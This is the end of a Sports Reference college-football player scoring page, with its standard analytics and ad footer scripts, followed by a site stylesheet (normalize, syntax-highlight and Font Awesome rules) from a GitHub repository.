<td align="right" ></td>
<td align="right" ></td>
<td align="right" >45</td>
<td align="right" >15</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >90</td>
</tr>
<tr class="">
<td align="right" csk="3">3</td>
<td align="left" csk="Newson,James"><a href="/cfb/players/james-newson-1.html">James Newson</a></td>
<td align="right" ></td>
<td align="right" >12</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >12</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >72</td>
</tr>
<tr class="">
<td align="right" csk="4">4</td>
<td align="left" csk="Kintner,Shawn"><a href="/cfb/players/shawn-kintner-1.html">Shawn Kintner</a></td>
<td align="right" ></td>
<td align="right" >4</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >4</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >24</td>
</tr>
<tr class="">
<td align="right" csk="5">5</td>
<td align="left" csk="Wright,Dwight"><a href="/cfb/players/dwight-wright-1.html">Dwight Wright</a></td>
<td align="right" >4</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >4</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >24</td>
</tr>
<tr class="">
<td align="right" csk="6">6</td>
<td align="left" csk="Farley,Kenny"><a href="/cfb/players/kenny-farley-1.html">Kenny Farley</a></td>
<td align="right" ></td>
<td align="right" >3</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >3</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >18</td>
</tr>
<tr class="">
<td align="right" csk="7">7</td>
<td align="left" csk="Anderson,Derek"><a href="/cfb/players/derek-anderson-1.html">Derek Anderson</a></td>
<td align="right" >2</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >2</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >1</td>
<td align="right" ></td>
<td align="right" >14</td>
</tr>
<tr class="">
<td align="right" csk="8">8</td>
<td align="left" csk="Happe,Noah"><a href="/cfb/players/noah-happe-1.html">Noah Happe</a></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >1</td>
<td align="right" >1</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >2</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >12</td>
</tr>
<tr class="">
<td align="right" csk="9">9</td>
<td align="left" csk="Cesca,Ryan"><a href="/cfb/players/ryan-cesca-1.html">Ryan Cesca</a></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >5</td>
<td align="right" >1</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >8</td>
</tr>
<tr class="">
<td align="right" csk="10">10</td>
<td align="left" csk="Kanekeberg,Ryan"><a href="/cfb/players/ryan-kanekeberg-1.html">Ryan Kanekeberg</a></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >1</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >1</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >6</td>
</tr>
<tr class="">
<td align="right" csk="11">11</td>
<td align="left" csk="Seigler,Richard"><a href="/cfb/players/richard-seigler-1.html">Richard Seigler</a></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >1</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >1</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >6</td>
</tr>
<tr class="">
<td align="right" csk="12">12</td>
<td align="left" csk="Clasen,Cole"><a href="/cfb/players/cole-clasen-1.html">Cole Clasen</a></td>
<td align="right" ></td>
<td align="right" >1</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >1</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >6</td>
</tr>
<tr class="">
<td align="right" csk="13">13</td>
<td align="left" csk="Jackson,Jermaine"><a href="/cfb/players/jermaine-jackson-1.html">Jermaine Jackson</a></td>
<td align="right" ></td>
<td align="right" >1</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >1</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >6</td>
</tr>
<tr class="">
<td align="right" csk="14">14</td>
<td align="left" csk="Boyd,Jayson"><a href="/cfb/players/jayson-boyd-1.html">Jayson Boyd</a></td>
<td align="right" ></td>
<td align="right" >1</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >1</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >6</td>
</tr>
<tr class="">
<td align="right" csk="15">15</td>
<td align="left" csk="Weathersby,Dennis"><a href="/cfb/players/dennis-weathersby-1.html">Dennis Weathersby</a></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >1</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >1</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >6</td>
</tr>
<tr class="">
<td align="right" csk="16">16</td>
<td align="left" csk="Haines,Dan"><a href="/cfb/players/dan-haines-1.html">Dan Haines</a></td>
<td align="right" ></td>
<td align="right" >1</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >1</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >6</td>
</tr>
<tr class="">
<td align="right" csk="17">17</td>
<td align="left" csk="Euhus,Tim"><a href="/cfb/players/tim-euhus-1.html">Tim Euhus</a></td>
<td align="right" ></td>
<td align="right" >1</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >1</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >6</td>
</tr>
</tbody>
</table>
</div>
</div>
<div id="sr_js"></div>
<script type="text/javascript">
(function () {
var sr_js_file = 'http://d2ft4b0ve1aur1.cloudfront.net/js-250/sr-cfb-min.js';
if (sr_gzipEnabled) {
sr_js_file = 'http://d2ft4b0ve1aur1.cloudfront.net/js-250/sr-cfb-min.js.jgz';
}
var sr_script_tag = document.getElementById("sr_js");
if (sr_script_tag) {
var scriptStyles = document.createElement("script");
scriptStyles.type = "text/javascript";
scriptStyles.src = sr_js_file;
sr_script_tag.appendChild(scriptStyles);
//alert('adding js to footer:'+sr_js_file);
}
}());
</script>
<div id="site_footer">
<div class="margin border">
<script type="text/javascript">
//<!--
google_ad_client = "ca-pub-5319453360923253";
/* Page Bottom - CFB */
google_ad_slot = "6637784901";
google_ad_width = 728;
google_ad_height = 90;
//-->
</script>
<script type="text/deferscript" defersrc="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
</div>
<div id="sr_footer">
Copyright © 2000-2012
<a href="http://www.sports-reference.com">Sports Reference LLC</a>.
All rights reserved.
<form class="inline margin_left" method="get" name="f_footer" action="/cfb/search.cgi">
<input x-webkit-speech type="text" id="search_footer" name="search" class="search long">
<input type="submit" value="Search" class="submit">
</form>
<div class="blockquote clear_both margin_top">
<a href="http://www.sports-reference.com/">A Sports Reference Site</a>:
<a href="/cfb/about/">About SR/CFB</a> |
<a href="/cfb/feedback/">Found a bug or have a suggestion?</a><br>
<a href="http://www.sports-reference.com/privacy.shtml">Privacy Statement</a> |
<a href="http://www.sports-reference.com/termsofuse.shtml">Conditions & Terms of Service</a> |
<a href="http://www.sports-reference.com/data_use.shtml">Use of Data</a>
</div>
<div class="blockquote italic_text clear_both margin_top">
Some school's results have been altered by retroactive NCAA penalties. As a
matter of policy, Sports Reference only reports the results of games as
played on the field. See our list of <a
href="/cfb/friv/forfeits.cgi">forfeits and vacated games</a> for more
details.
</div>
<div class="blockquote clear_both margin_top margin_bottom">
Part of the <a target="_blank" title="USA TODAY Sports"
href="http://Sports.USATODAY.com/">USA TODAY Sports Media Group</a>.
</div>
</div><!-- div#sr_footer -->
</div><!-- div#site_footer -->
<!-- google +1 code -->
<script type="text/deferscript">
(function() {
var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;
po.src = 'https://apis.google.com/js/plusone.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);
})();
</script>
<!-- google analytics code -->
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._createTracker("UA-1890630-11");
pageTracker._setCookiePath("/cfb/");
pageTracker._trackPageview();
pageTracker._trackPageLoadTime();
var sr_tracker = _gat._createTracker("UA-1890630-9");
sr_tracker._setDomainName('none');
sr_tracker._setAllowLinker(true);
sr_tracker._setAllowHash(false);
sr_tracker._setCustomVar(1,"site","cfb",3);
sr_tracker._trackPageview();
} catch(err) {}</script>
<!-- End Google Analytics Tag -->
<!-- Begin comScore Tag -->
<script type="text/deferscript">
document.write(unescape("%3Cscript src='" + (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js' %3E%3C/script%3E"));
</script>
<script type="text/deferscript">
COMSCORE.beacon({
c1:2,
c2:"6035210",
c3:"",
c4:"www.sports-reference.com/cfb",
c5:"",
c6:"",
c15:""
});
</script>
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6035210&c3=&c4=www.sports-reference.com/cfb&c5=&c6=&c15=&cv=1.3&cj=1" width="0" height="0" alt="" />
</noscript>
<!-- End comScore Tag -->
<script type="text/deferscript">
(function(d, s, id) {
var js, fjs = d.getElementsByTagName(s)[0];
if (d.getElementById(id)) {return;}
js = d.createElement(s); js.id = id;
js.src = "//connect.facebook.net/en_US/all.js#xfbml=1&appId=220051088022369";
fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));
</script>
<!-- google +1 code -->
<script type="text/deferscript">
(function() {
var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;
po.src = 'https://apis.google.com/js/plusone.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);
})();
</script>
</div>
</body>
</html>
|
assets/css/main.min.css | lwasser/NEON-Data-Skills | /*! normalize.css v2.1.0 | MIT License | git.io/normalize */article, aside, details, figcaption, figure, footer, header, hgroup, main, nav, section, summary {
display: block
}
audio, canvas, video {
display: inline-block
}
audio:not([controls]) {
display: none;
height: 0
}
[hidden] {
display:none
}
html {
/* font-family: sans-serif; */
font-family: "Source Sans Pro",Helvetica,Arial,sans-serif;
-webkit-text-size-adjust: 100%;
-ms-text-size-adjust: 100%
}
body {
margin: 0
}
a:focus {
outline: thin dotted
}
a:active, a:hover {
outline: 0
}
h1 {
margin: .67em 0;
font-size: 2em
}
abbr[title] {
border-bottom: 1px dotted
}
b, strong {
font-weight: bold
}
dfn {
font-style: italic
}
hr {
height: 0;
-moz-box-sizing: content-box;
box-sizing: content-box
}
mark {
color: #000;
background: #ff0
}
code, kbd, pre, samp {
font-family: monospace, serif;
font-size: 1em
}
pre {
white-space: pre
}
q {
quotes: "\201C" "\201D" "\2018" "\2019"
}
small {
font-size: 80%
}
sub, sup {
position: relative;
font-size: 75%;
line-height: 0;
vertical-align: baseline
}
sup {
top: -0.5em
}
sub {
bottom: -0.25em
}
img {
border: 0
}
svg:not(:root) {
overflow: hidden
}
figure {
margin: 0
}
fieldset {
padding: .35em .625em .75em;
margin: 0 2px;
border: 1px solid #c0c0c0
}
legend {
padding: 0;
border: 0
}
button, input, select, textarea {
margin: 0;
font-family: inherit;
font-size: 100%
}
button, input {
line-height: normal
}
button, select {
text-transform: none
}
button, html input[type="button"], input[type="reset"], input[type="submit"] {
cursor: pointer;
-webkit-appearance: button
}
button[disabled], html input[disabled] {
cursor: default
}
input[type="checkbox"], input[type="radio"] {
padding: 0;
box-sizing: border-box
}
input[type="search"] {
-webkit-box-sizing: content-box;
-moz-box-sizing: content-box;
box-sizing: content-box;
-webkit-appearance: textfield
}
input[type="search"]::-webkit-search-cancel-button, input[type="search"]::-webkit-search-decoration {
-webkit-appearance:none
}
button::-moz-focus-inner, input::-moz-focus-inner {
padding:0;
border:0
}
textarea {
overflow: auto;
vertical-align: top
}
table {
width: 100%;
margin-bottom: 1.5em;
border-collapse: collapse;
border-spacing: 0
}
::-moz-selection {
color:#343434;
text-shadow:none;
background-color:#dadada
}
::selection {
color: #343434;
text-shadow: none;
background-color: #dadada
}
.all-caps {
text-transform: uppercase
}
.pull-left {
float: left
}
.pull-right {
float: right
}
.image-pull-right {
float: right;
margin-top: 0
}
.clearfix {
*zoom:1
}
.clearfix:before, .clearfix:after {
display: table;
content: ""
}
.clearfix:after {
clear: both
}
.unstyled-list {
padding-left: 0;
margin-left: 0;
list-style: none
}
.unstyled-list li {
list-style-type: none
}
b, i, strong, em, blockquote, p, q, span, figure, img, h1, h2, header, input, a {
-webkit-transition: all .2s ease;
-moz-transition: all .2s ease;
-ms-transition: all .2s ease;
-o-transition: all .2s ease;
transition: all .2s ease
}
h1, h2, h3, h4, h5, h6 {
font-family: 'PT Sans Narrow', sans-serif
}
h1 {
margin: 20px 0 6px 0;
margin: 2rem 0 0.625rem 0;
font-size: 32px;
font-size: 2rem;
line-height: 1.2
}
h2 {
margin: 30px 0 8px 0;
margin: 3rem 0 0.925rem 0;
font-size: 28px;
font-size: 1.75rem;
line-height: .9286
}
h3 {
margin-bottom: 26px;
margin-bottom: 1.625rem;
font-size: 24px;
font-size: 1.5rem;
line-height: 1.0833
}
h4 {
margin-bottom: 26px;
margin-bottom: 1.625rem;
font-size: 18px;
font-size: 1.125rem;
line-height: 1.4444
}
h5 {
margin-bottom: 26px;
margin-bottom: 1.625rem;
font-size: 16px;
font-size: 1rem;
line-height: 1.625
}
h6 {
margin-bottom: 26px;
margin-bottom: 1.625rem;
font-size: 14px;
font-size:.875rem;
line-height: 1.8571
}
a {
color: #343434;
text-decoration: none
}
a:visited {
color: #676767
}
a:hover {
color: #010101
}
a:focus {
color: #010101;
outline: thin dotted
}
a:hover, a:active {
outline: 0
}
figcaption {
padding-top: 10px;
font-size: 14px;
font-size:.875rem;
line-height: 1.8571;
line-height: 1.3;
color: #4d4d4b;
margin-bottom: 1.5rem;
}
.image-credit {
display: inline;
display: block;
float: left;
width: 100%;
margin-right: 8.333333333333334%;
margin-left: 8.333333333333334%;
font-size: 12px;
font-size:.75rem;
font-style: italic;
line-height: 2.1667;
line-height: 1.3;
color: #80807e;
text-align: right
}
@media only screen and (min-width:37.5em) {
.image-credit {
display: inline;
float: left;
width: 100%;
margin-right: 0;
margin-left: 0
}
}
@media only screen and (min-width:86.375em) {
.image-credit {
display: inline;
float: left;
width: 100%
}
}
.image-credit a {
color: #80807e
}
/* commenting this out and updating with the element below
.notice {
padding: .5em 1em;
margin-top: 1.5em;
font-size: 14px;
font-size:.875rem;
text-indent: 0;
background-color: #fff;
border: 1px solid #ccc;
-webkit-border-radius: 3px;
-moz-border-radius: 3px;
border-radius: 3px
} */
.notice {
/* grey is now light blue! */
background-color: #bde9f5;
border-radius: 10px;
-webkit-border-radius: 10px;
-moz-border-radius: 10px;
font-size: 0.875rem;
line-height: 1.71429;
margin-bottom: 1.4em;
padding: 1.618em;
position: relative;
}
blockquote {
padding-left: 20px;
margin-left: -28px;
font-family: 'PT Serif', serif;
font-style: italic;
border-left: 8px solid #333332
}
.footnotes ol, .footnotes li, .footnotes p {
margin-bottom: 0;
font-size: 14px;
font-size:.875rem
}
p {
margin: 0 0 1.625rem
line-height: 1.2rem;
}
.article-wrap li {
line-height: 1.2rem;
margin-bottom: 0.3rem;
}
p+p {
/* margin-top: -1.625rem;
text-indent: 1.625rem */
margin-top:0rem;
}
tt, code, kbd, samp, pre {
font-family: Monaco, "Courier New", "DejaVu Sans Mono", "Bitstream Vera Sans Mono", monospace
}
p code, li code {
padding: 0 5px;
margin: 0 2px;
font-size: 12px;
font-size:.75rem;
line-height: 1.5;
white-space: nowrap;
background-color: #efefef;
border: 1px solid #f7f7f7;
-webkit-border-radius: 3px;
-moz-border-radius: 3px;
border-radius: 3px
}
pre {
overflow-x: auto;
font-size: 12px;
font-size:.75rem;
line-height: 1.5;
padding:0px;
box-shadow:5px 5px 5px #666;
border: 1px solid #ccc;
margin:40px 0;
}
.highlight {
margin-bottom: 1.5em;
font-family: Monaco, "Courier New", "DejaVu Sans Mono", "Bitstream Vera Sans Mono", monospace;
font-size: 12px;
font-size:.75rem;
line-height: 1.4;
color: #333332;
background-color: #efefef;
-webkit-border-radius: 4px;
-moz-border-radius: 4px;
border-radius: 4px
}
.highlight pre {
position: relative;
padding: 1em;
margin: 0
}
.highlight .lineno {
padding-right: 24px;
color: #b3b3b1
}
.highlight .hll {
background-color: #ffc
}
.highlight .c {
font-style: italic;
color: #998
}
.highlight .err {
color: #a61717;
background-color: #e3d2d2
}
.highlight .k {
font-weight: bold;
color: #000
}
.highlight .o {
font-weight: bold;
color: #000
}
.highlight .cm {
font-style: italic;
color: #998
}
.highlight .cp {
font-style: italic;
font-weight: bold;
color: #999
}
.highlight .c1 {
font-style: italic;
color: #998
}
.highlight .cs {
font-style: italic;
font-weight: bold;
color: #999
}
.highlight .gd {
color: #000;
background-color: #fdd
}
.highlight .ge {
font-style: italic;
color: #000
}
.highlight .gr {
color: #a00
}
.highlight .gh {
color: #999
}
.highlight .gi {
color: #000;
background-color: #dfd
}
.highlight .go {
color: #888
}
.highlight .gp {
color: #555
}
.highlight .gs {
font-weight: bold
}
.highlight .gu {
color: #aaa
}
.highlight .gt {
color: #a00
}
.highlight .kc {
font-weight: bold;
color: #000
}
.highlight .kd {
font-weight: bold;
color: #000
}
.highlight .kn {
font-weight: bold;
color: #000
}
.highlight .kp {
font-weight: bold;
color: #000
}
.highlight .kr {
font-weight: bold;
color: #000
}
.highlight .kt {
font-weight: bold;
color: #458
}
.highlight .m {
color: #099
}
.highlight .s {
color: #d01040
}
.highlight .na {
color: #008080
}
.highlight .nb {
color: #0086b3
}
.highlight .nc {
font-weight: bold;
color: #458
}
.highlight .no {
color: #008080
}
.highlight .nd {
font-weight: bold;
color: #3c5d5d
}
.highlight .ni {
color: #800080
}
.highlight .ne {
font-weight: bold;
color: #900
}
.highlight .nf {
font-weight: bold;
color: #900
}
.highlight .nl {
font-weight: bold;
color: #900
}
.highlight .nn {
color: #555
}
.highlight .nt {
color: #000080
}
.highlight .nv {
color: #008080
}
.highlight .ow {
font-weight: bold;
color: #000
}
.highlight .w {
color: #bbb
}
.highlight .mf {
color: #099
}
.highlight .mh {
color: #099
}
.highlight .mi {
color: #099
}
.highlight .mo {
color: #099
}
.highlight .sb {
color: #d01040
}
.highlight .sc {
color: #d01040
}
.highlight .sd {
color: #d01040
}
.highlight .s2 {
color: #d01040
}
.highlight .se {
color: #d01040
}
.highlight .sh {
color: #d01040
}
.highlight .si {
color: #d01040
}
.highlight .sx {
color: #d01040
}
.highlight .sr {
color: #009926
}
.highlight .s1 {
color: #d01040
}
.highlight .ss {
color: #990073
}
.highlight .bp {
color: #999
}
.highlight .vc {
color: #008080
}
.highlight .vg {
color: #008080
}
.highlight .vi {
color: #008080
}
.highlight .il {
color: #099
}
.CodeRay {
margin-bottom: 1.5em;
font-family: Monaco, "Courier New", "DejaVu Sans Mono", "Bitstream Vera Sans Mono", monospace;
font-size: 12px;
font-size:.75rem;
line-height: 2.1667;
color: #333332;
background-color: #efefef;
-webkit-border-radius: 4px;
-moz-border-radius: 4px;
border-radius: 4px
}
.CodeRay pre {
padding: 1em;
margin: 0
}
span.CodeRay {
padding: 2px;
white-space: pre;
border: 0
}
table.CodeRay {
width: 100%;
padding: 2px;
border-collapse: collapse
}
table.CodeRay td {
padding: 1em .5em;
vertical-align: top
}
.CodeRay .line-numbers, .CodeRay .no {
color: #AAA;
text-align: right;
background-color: #ececec
}
.CodeRay .line-numbers a {
color: #AAA
}
.CodeRay .line-numbers tt {
font-weight: bold
}
.CodeRay .line-numbers .highlighted {
color: #f00
}
.CodeRay .line {
display: block;
float: left;
width: 100%
}
.CodeRay span.line-numbers {
padding: 0 24px 0 4px
}
.CodeRay .code {
width: 100%
}
ol.CodeRay {
font-size: 10pt
}
ol.CodeRay li {
white-space: pre
}
.CodeRay .code pre {
overflow: auto
}
.CodeRay .debug {
color: white!important;
background: blue!important
}
.CodeRay .annotation {
color: #007
}
.CodeRay .attribute-name {
color: #f08
}
.CodeRay .attribute-value {
color: #700
}
.CodeRay .binary {
font-weight: bold;
color: #509
}
.CodeRay .comment {
font-style: italic;
color: #998
}
.CodeRay .char {
color: #04d
}
.CodeRay .char .content {
color: #04d
}
.CodeRay .char .delimiter {
color: #039
}
.CodeRay .class {
font-weight: bold;
color: #458
}
.CodeRay .complex {
font-weight: bold;
color: #A08
}
.CodeRay .constant {
color: teal
}
.CodeRay .color {
color: #0a0
}
.CodeRay .class-variable {
color: #369
}
.CodeRay .decorator {
color: #B0B
}
.CodeRay .definition {
font-weight: bold;
color: #099
}
.CodeRay .directive {
font-weight: bold;
color: #088
}
.CodeRay .delimiter {
color: #000
}
.CodeRay .doc {
color: #970
}
.CodeRay .doctype {
color: #34b
}
.CodeRay .doc-string {
font-weight: bold;
color: #D42
}
.CodeRay .escape {
font-weight: bold;
color: #666
}
.CodeRay .entity {
font-weight: bold;
color: #800
}
.CodeRay .error {
color: #F00;
background-color: #faa
}
.CodeRay .exception {
font-weight: bold;
color: #C00
}
.CodeRay .filename {
color: #099
}
.CodeRay .function {
font-weight: bold;
color: #900
}
.CodeRay .global-variable {
font-weight: bold;
color: teal
}
.CodeRay .hex {
font-weight: bold;
color: #058
}
.CodeRay .integer {
color: #099
}
.CodeRay .include {
font-weight: bold;
color: #B44
}
.CodeRay .inline {
color: #000
}
.CodeRay .inline .inline {
background: #ccc
}
.CodeRay .inline .inline .inline {
background: #bbb
}
.CodeRay .inline .inline-delimiter {
color: #D14
}
.CodeRay .inline-delimiter {
color: #D14
}
.CodeRay .important {
color: #f00
}
.CodeRay .interpreted {
font-weight: bold;
color: #B2B
}
.CodeRay .instance-variable {
color: #008080
}
.CodeRay .label {
font-weight: bold;
color: #970
}
.CodeRay .local-variable {
color: #963
}
.CodeRay .octal {
font-weight: bold;
color: #40E
}
.CodeRay .predefined-constant {
font-weight: bold
}
.CodeRay .predefined {
font-weight: bold;
color: #369
}
.CodeRay .preprocessor {
color: #579
}
.CodeRay .pseudo-class {
font-weight: bold;
color: #00C
}
.CodeRay .predefined-type {
font-weight: bold;
color: #074
}
.CodeRay .reserved, .keyword {
font-weight: bold;
color: #000
}
.CodeRay .key {
color: #808
}
.CodeRay .key .delimiter {
color: #606
}
.CodeRay .key .char {
color: #80f
}
.CodeRay .value {
color: #088
}
.CodeRay .regexp {
background-color: #fff0ff
}
.CodeRay .regexp .content {
color: #808
}
.CodeRay .regexp .delimiter {
color: #404
}
.CodeRay .regexp .modifier {
color: #c2c
}
.CodeRay .regexp .function {
font-weight: bold;
color: #404
}
.CodeRay .string {
color: #D20
}
.CodeRay .string .string .string {
background-color: #ffd0d0
}
.CodeRay .string .content {
color: #D14
}
.CodeRay .string .char {
color: #D14
}
.CodeRay .string .delimiter {
color: #D14
}
.CodeRay .shell {
color: #d14
}
.CodeRay .shell .delimiter {
color: #d14
}
.CodeRay .symbol {
color: #990073
}
.CodeRay .symbol .content {
color: #a60
}
.CodeRay .symbol .delimiter {
color: #630
}
.CodeRay .tag {
color: #070
}
.CodeRay .tag-special {
font-weight: bold;
color: #D70
}
.CodeRay .type {
font-weight: bold;
color: #339
}
.CodeRay .variable {
color: #036
}
.CodeRay .insert {
background: #afa
}
.CodeRay .delete {
background: #faa
}
.CodeRay .change {
color: #aaf;
background: #007
}
.CodeRay .head {
color: #f8f;
background: #505
}
.CodeRay .insert .insert {
font-weight: bold;
color: #080
}
.CodeRay .delete .delete {
font-weight: bold;
color: #800
}
.CodeRay .change .change {
color: #66f
}
.CodeRay .head .head {
color: #f4f
}
.clearfix {
*zoom:1
}
.clearfix:before, .clearfix:after {
display: table;
line-height: 0;
content: ""
}
.clearfix:after {
clear: both
}
.hidden {
display: none;
visibility: hidden
}
.visuallyhidden.focusable:active, .visuallyhidden.focusable:focus {
position: static;
width: auto;
height: auto;
margin: 0;
overflow: visible;
clip: auto
}
hr {
display: block;
height: 1px;
padding: 0;
margin: 1em 0;
border: 0;
border-top: 1px solid #ccc;
border-bottom: 1px solid #fff
}
figure {
margin-bottom: 1.625rem
}
article img {
height: auto;
max-width: 100%;
vertical-align: middle;
border-width: 0;
-ms-interpolation-mode: bicubic
}
svg:not(:root) {
overflow: hidden
}
.half {
width: 100%;
margin: 0 auto;
*zoom:1
}
.half:before, .half:after {
display: table;
content: ""
}
.half:after {
clear: both
}
.half:before, .half:after {
display: table;
line-height: 0;
content: ""
}
.half:after {
clear: both
}
@media only screen and (min-width:30em) {
.half img {
display: inline;
float: left;
padding: 0.1rem;
width: 48%;
}
.half figcaption {
display: inline;
float: left;
width: 100%
}
}
.third {
width: 100%;
margin: 0 auto;
*zoom:1
}
.third:before, .third:after {
display: table;
content: ""
}
.third:after {
clear: both
}
.third:before, .third:after {
display: table;
line-height: 0;
content: ""
}
.third:after {
clear: both
}
@media only screen and (min-width:30em) {
.third img {
display: inline;
float: left;
width: 31.333333333333336%;
padding:.1em;
}
.third figcaption {
display: inline;
float: left;
width: 100%
}
}
.btn {
display: inline-block;
padding: 8px 20px;
margin-bottom: 20px;
font-size: 14px;
font-size:.875rem;
color: #fff;
background-color: #111;
border-color: #111;
border-style: solid!important;
border-width: 2px!important;
-webkit-border-radius: 7px;
-moz-border-radius: 7px;
border-radius: 7px
}
.btn:visited {
color: #fff
}
.btn:hover {
color: #111;
background-color: #fff
}
.btn-success {
color: #fff;
background-color: #1ea0c1;
border-color: #1ea0c1;
/*
background-color: #5cb85c;
border-color: #5cb85c
*/
}
.btn-success:visited {
color: #fff
}
.btn-success:hover {
color: #1ea0c1;
background-color: #fff
}
.btn-warning {
color: #fff;
background-color: #dd8338;
border-color: #dd8338
}
.btn-warning:visited {
color: #fff
}
.btn-warning:hover {
color: #dd8338;
background-color: #fff
}
.btn-danger {
color: #fff;
background-color: #c64537;
border-color: #c64537
}
.btn-danger:visited {
color: #fff
}
.btn-danger:hover {
color: #c64537;
background-color: #fff
}
.btn-info {
color: #fff;
background-color: #308cbc;
border-color: #308cbc
}
.btn-info:visited {
color: #fff
}
.btn-info:hover {
color: #308cbc;
background-color: #fff
}
.well {
min-height: 20px;
padding: 19px;
margin-bottom: 20px;
background-color: #f5f5f5;
border: 1px solid #e3e3e3;
-webkit-border-radius: 4px;
-moz-border-radius: 4px;
border-radius: 4px;
-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.05);
-moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.05);
box-shadow: inset 0 1px 1px rgba(0,0,0,0.05)
}/*!
* Font Awesome 4.1.0 by @davegandy - http://fontawesome.io - @fontawesome
* License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License)
*/
@font-face {
font-family: 'FontAwesome';
font-style: normal;
font-weight: normal;
src: url('../fonts/fontawesome-webfont.eot?v=4.1.0');
src: url('../fonts/fontawesome-webfont.eot?#iefix&v=4.1.0') format('embedded-opentype'), url('../fonts/fontawesome-webfont.woff?v=4.1.0') format('woff'), url('../fonts/fontawesome-webfont.ttf?v=4.1.0') format('truetype'), url('../fonts/fontawesome-webfont.svg?v=4.1.0#fontawesomeregular') format('svg')
}
.fa {
display: inline-block;
font-family: FontAwesome;
-webkit-font-smoothing: antialiased;
font-style: normal;
font-weight: normal;
line-height: 1;
-moz-osx-font-smoothing: grayscale
}
.fa-star {content: $fa-var-star;}
.fa-star:before {content: $fa-var-star;}
/*the new code... not turning this on just yet.
.fa {
-moz-font-feature-settings: normal;
-moz-font-language-override: normal;
-moz-osx-font-smoothing: grayscale;
display: inline-block;
font-family: FontAwesome;
font-size: inherit;
font-size-adjust: none;
font-stretch: normal;
font-style: normal;
font-variant: normal;
font-weight: normal;
line-height: 1;
text-rendering: auto;
}*/
.fa-lg {
font-size: 1.3333333333333333em;
line-height: .75em;
vertical-align: -15%
}
.fa-2x {
font-size: 2em
}
.fa-3x {
font-size: 3em
}
.fa-4x {
font-size: 4em
}
.fa-5x {
font-size: 5em
}
.fa-fw {
width: 1.2857142857142858em;
text-align: center
}
.fa-ul {
padding-left: 0;
margin-left: 2.142857142857143em;
list-style-type: none
}
.fa-ul>li {
position: relative
}
.fa-li {
position: absolute;
top: .14285714285714285em;
